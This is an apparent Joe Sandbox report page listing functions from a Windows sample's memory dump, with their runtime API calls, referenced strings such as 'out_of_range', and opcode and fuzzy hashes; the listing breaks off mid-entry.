Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: eea83e675726579202ae46558f478e57f494447b85c4049c91ddb9471f815998
Instruction ID: a9e768f0553879413d91c91332f6a85bf31abede7620d421f4072f24e476817b
Opcode Fuzzy Hash: eea83e675726579202ae46558f478e57f494447b85c4049c91ddb9471f815998
Instruction Fuzzy Hash: 93129321E1C24387FF609A15E89427B76A6FB40754F984135EADAC76C4DF7CE9808B13

Function 00007FF6218588C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF621858AA3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621858B2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621858B33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621858B39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621858B3F

Strings

other_error, xrefs: 00007FF621858932

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: other_error
API String ID: 1944019136-896093151
Opcode ID: 712791bfdda485dd6c8cd5bd84b03dc969ce618784fc9f5a1f6ad325b00cc61f
Instruction ID: 7f6ad9b444f89f48c9e2f25a346d58cc2b3c4b434c5b73b083f283e0dc77888c
Opcode Fuzzy Hash: 712791bfdda485dd6c8cd5bd84b03dc969ce618784fc9f5a1f6ad325b00cc61f
Instruction Fuzzy Hash: E1719462F1DB8199FF00CF75D8803AC2361EB56798F105232EA6DD6ADADE3C9185C341

Function 00007FF621869970 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF621869B53
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621869BDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621869BE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621869BE9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621869BEF

Strings

out_of_range, xrefs: 00007FF6218699E2

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: out_of_range
API String ID: 1944019136-3053435996
Opcode ID: 9212de46fa7395a911b971c321d16e1794286db47df8c6110f06df9fdb13b6bd
Instruction ID: 7fcc2e0458762976c09584e1b2f452767885d1fd21f453cbe9d59d43bc97a020
Opcode Fuzzy Hash: 9212de46fa7395a911b971c321d16e1794286db47df8c6110f06df9fdb13b6bd
Instruction Fuzzy Hash: DE718062F1DB8689FF00CF75D8803AC2361EB557A8F505231EA6C96ADAEE7C9185C341

Function 00007FF62189E0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF62189E2A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189E32D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189E333
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189E339
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189E33F

Strings

out_of_range, xrefs: 00007FF62189E132

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: out_of_range
API String ID: 1944019136-3053435996
Opcode ID: b998a36bfdf0e7fbf84ad9b0bb10f67b5024519ae84c44f7f7b38b620245a96d
Instruction ID: 2870b13899ff036e18a58d64b5fb2af43fa2ccbe1e16d1da45432d8ab1f8adb6
Opcode Fuzzy Hash: b998a36bfdf0e7fbf84ad9b0bb10f67b5024519ae84c44f7f7b38b620245a96d
Instruction Fuzzy Hash: FF718163F19B8189FF00CFB4D8903EC2361AB55798F109631EA6DD6ADAEE3C9185C341

Function 00007FF621857AC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF621857C9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621857D24
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621857D2A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621857D30
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621857D36

Strings

type_error, xrefs: 00007FF621857B34

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: type_error
API String ID: 1944019136-1406221190
Opcode ID: ba61249f3680ad7da12bcdafa42937631c5a0735b293a25b9f20068afcdb00b0
Instruction ID: 6cf5b31e32b1cdda8f4d3c4f8879cfc4ac3070a09ac9d992452296a666732d82
Opcode Fuzzy Hash: ba61249f3680ad7da12bcdafa42937631c5a0735b293a25b9f20068afcdb00b0
Instruction Fuzzy Hash: 9D71A063F1DB8199FF00CB75D8903AC2361EB45398F509231DE6D96ADAEE3CA185C341

Function 00007FF62186CB00 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF62186CCDF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186CD64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186CD6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186CD70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186CD76

Strings

invalid_iterator, xrefs: 00007FF62186CB74

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: invalid_iterator
API String ID: 1944019136-2508626007
Opcode ID: 29a39a26683d9bf54d9d8e0bbee0046a60ceee04d530c13b4e189298c0865eb7
Instruction ID: a66aa9a31d41e5f5759b1d13e3581987e5f3cfbd3d1132d34201980ea771f3f4
Opcode Fuzzy Hash: 29a39a26683d9bf54d9d8e0bbee0046a60ceee04d530c13b4e189298c0865eb7
Instruction Fuzzy Hash: 53719063F1DB8689FF00CB75D8903AC2361AB55798F109231DE6CD6ADAEE3CA185C341

Function 00007FF62183EF10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183F0B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183F0B8
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62183F0F0
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62183F0FD

Strings

at line , xrefs: 00007FF62183EF9A
, column , xrefs: 00007FF62183EFC8

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
String ID: at line $, column
API String ID: 729085983-191570568
Opcode ID: 90beb9351d928bd0614efb3565a96365af930e9f11adeab84e3af5f36f7b1c56
Instruction ID: a3567fc6b79ca1c6d037bbac94d708904f9ac10c48ef0345c94a7d5cd60da234
Opcode Fuzzy Hash: 90beb9351d928bd0614efb3565a96365af930e9f11adeab84e3af5f36f7b1c56
Instruction Fuzzy Hash: 0351A362A0CB8141EF149B19E98026EB761FB85BD4F144231EBADC7BDADF3CD5818742

Function 00007FF6218C43CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6218C467E,?,?,?,00007FF6218C4370,?,?,?,00007FF6218C0E4D), ref: 00007FF6218C4451
GetLastError.KERNEL32(?,?,?,00007FF6218C467E,?,?,?,00007FF6218C4370,?,?,?,00007FF6218C0E4D), ref: 00007FF6218C445F
LoadLibraryExW.KERNEL32(?,?,?,00007FF6218C467E,?,?,?,00007FF6218C4370,?,?,?,00007FF6218C0E4D), ref: 00007FF6218C4489
FreeLibrary.KERNEL32(?,?,?,00007FF6218C467E,?,?,?,00007FF6218C4370,?,?,?,00007FF6218C0E4D), ref: 00007FF6218C44F7
GetProcAddress.KERNEL32(?,?,?,00007FF6218C467E,?,?,?,00007FF6218C4370,?,?,?,00007FF6218C0E4D), ref: 00007FF6218C4503

Strings

api-ms-, xrefs: 00007FF6218C4471

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 081807f0f237e99e654a6d52eb3ba83cc0c1c8883019cc9f4ec60aedd52be443
Instruction ID: e358e50a5b0ecc0682ade30dc5a83361e067b6cb5487215d3f1dc7b4dcb4cebd
Opcode Fuzzy Hash: 081807f0f237e99e654a6d52eb3ba83cc0c1c8883019cc9f4ec60aedd52be443
Instruction Fuzzy Hash: 0B317C21A1EA4291EF1ADB12AC80575A3D4BF44BA4F694635EE2DD7784EF3CE4848302

Function 00007FF6218A9EEC Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6218A9EFB
FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
FlsSetValue.KERNEL32 ref: 00007FF6218A9F31
FlsSetValue.KERNEL32 ref: 00007FF6218A9F5E
FlsSetValue.KERNEL32 ref: 00007FF6218A9F6F
FlsSetValue.KERNEL32 ref: 00007FF6218A9F80
SetLastError.KERNEL32 ref: 00007FF6218A9F9B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 9747bb4f3c298db2fbbdbb335984d54faac6d614edc6b06a862052053e19b529
Instruction ID: 620ad4735ce8b2dc1adfe3f2230c139caf1090fd73550d33ee4d0321335e1d97
Opcode Fuzzy Hash: 9747bb4f3c298db2fbbdbb335984d54faac6d614edc6b06a862052053e19b529
Instruction Fuzzy Hash: CA215E20F0D64243FF59AB21AED117A629A5F447B4F545734E93EC76C6EE2DF4418203

Function 00007FF6218BC8CC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6218BC8FD
GetLastError.KERNEL32 ref: 00007FF6218BC909
CloseHandle.KERNEL32 ref: 00007FF6218BC921
CreateFileW.KERNEL32 ref: 00007FF6218BC94C
WriteConsoleW.KERNEL32 ref: 00007FF6218BC96B

Strings

CONOUT$, xrefs: 00007FF6218BC92D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 53dac6272d403f79ff27e653aa55d51cb6535fcae6368453f164039c5e4e95e8
Instruction ID: 589bddc874b67bdefb6797b8240fff74cbaf2a95905419e676b4a8bc0b7f1285
Opcode Fuzzy Hash: 53dac6272d403f79ff27e653aa55d51cb6535fcae6368453f164039c5e4e95e8
Instruction Fuzzy Hash: FA119021B1CB4186FB508F02EC9432966A0FB88BE8F040234EA5DC7B94CF7CDA458745

Function 00007FF6218CD42C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF6218CD4D9
MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD575
MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD61E
MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD648
MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD6F0
CompareStringEx.KERNEL32 ref: 00007FF6218CD73D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 26eb7e015d5d110b74ff0d84bcaa31491d724dbf353ec7a17117fafe3eaea0ab
Instruction ID: c8592df16bcd54ee852847407d7099151b9d60a5ed0f0312b5372d6ae64efa08
Opcode Fuzzy Hash: 26eb7e015d5d110b74ff0d84bcaa31491d724dbf353ec7a17117fafe3eaea0ab
Instruction Fuzzy Hash: 12A1C462A0D68286EF25AF1498903BD6791AF41B98F444731EA5DCB7C5FF3EE444C382

Function 00007FF6218CD0CC Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD13C
MultiByteToWideChar.KERNEL32 ref: 00007FF6218CD1DA
LCMapStringEx.KERNEL32 ref: 00007FF6218CD243
LCMapStringEx.KERNEL32 ref: 00007FF6218CD295
LCMapStringEx.KERNEL32 ref: 00007FF6218CD33A
WideCharToMultiByte.KERNEL32 ref: 00007FF6218CD394

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 7d9f455a94f84a05f587d57d339c879795f99f0f1217d4298ff39db3fa6ba98e
Instruction ID: f4d38c5abc75b9af774c2fc9313f39192074c1e638e92b3a7d7b57349c3d03d5
Opcode Fuzzy Hash: 7d9f455a94f84a05f587d57d339c879795f99f0f1217d4298ff39db3fa6ba98e
Instruction Fuzzy Hash: E9816072A0CB4186EF649F65AC80269B3A5FB847A8F144736EA5DC7BD8EF3DD4008741

Function 00007FF6218A0840 Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A08B2
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A08E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0923
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0965
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A099A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0A17

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 619b2885e3fd1682f6a864358b33df5452abb606e6c6f730ccce56a3fdc98189
Instruction ID: e6645168c8dae041bedf1832bf4c13f92e2f3ac747a5b8e71e091383fa8b539b
Opcode Fuzzy Hash: 619b2885e3fd1682f6a864358b33df5452abb606e6c6f730ccce56a3fdc98189
Instruction Fuzzy Hash: 73513F2290DA8687FF529F2498E03BD7791AB4AB44F588071C68CC73C6DE2DA856C753

Function 00007FF6218C1F14 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6218C20B2
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6218C23DB

Strings

csm, xrefs: 00007FF6218C20D9
csm, xrefs: 00007FF6218C1FF9
csm, xrefs: 00007FF6218C205B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: c1d1beaa4113af996e1338b12892c8267a8f52db6b2a83b87ebed410bd88f7c3
Instruction ID: 8f6697dd5a249efbede756cf75a9195566ed9dab2ed2b1d79b8bcc8315886e32
Opcode Fuzzy Hash: c1d1beaa4113af996e1338b12892c8267a8f52db6b2a83b87ebed410bd88f7c3
Instruction Fuzzy Hash: E7E1837290CB828AEB549F64D8C02AD77A1FB55B88F144235EA8DD76D6DF3CE481C702

Function 00007FF6218AA064 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA073
FlsSetValue.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA0A9
FlsSetValue.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA0D6
FlsSetValue.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA0E7
FlsSetValue.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA0F8
SetLastError.KERNEL32(?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218AA113

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4c8fc69ed0042268b843e98e05e9f4a1279c607e92fb1daed3d92d37e01c9d1d
Instruction ID: e2e37b7040d97cda9c3fcb4f8e0469240b583394adb1c31e1502d3bec4170d4f
Opcode Fuzzy Hash: 4c8fc69ed0042268b843e98e05e9f4a1279c607e92fb1daed3d92d37e01c9d1d
Instruction Fuzzy Hash: CB114A20F0D68283FF5467215ED107A62926F487B0F140738E93EC6AC6EE3DF4418203

Function 00007FF621896F40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF621896FCB

Strings

?, xrefs: 00007FF621896F80

Memory Dump Source

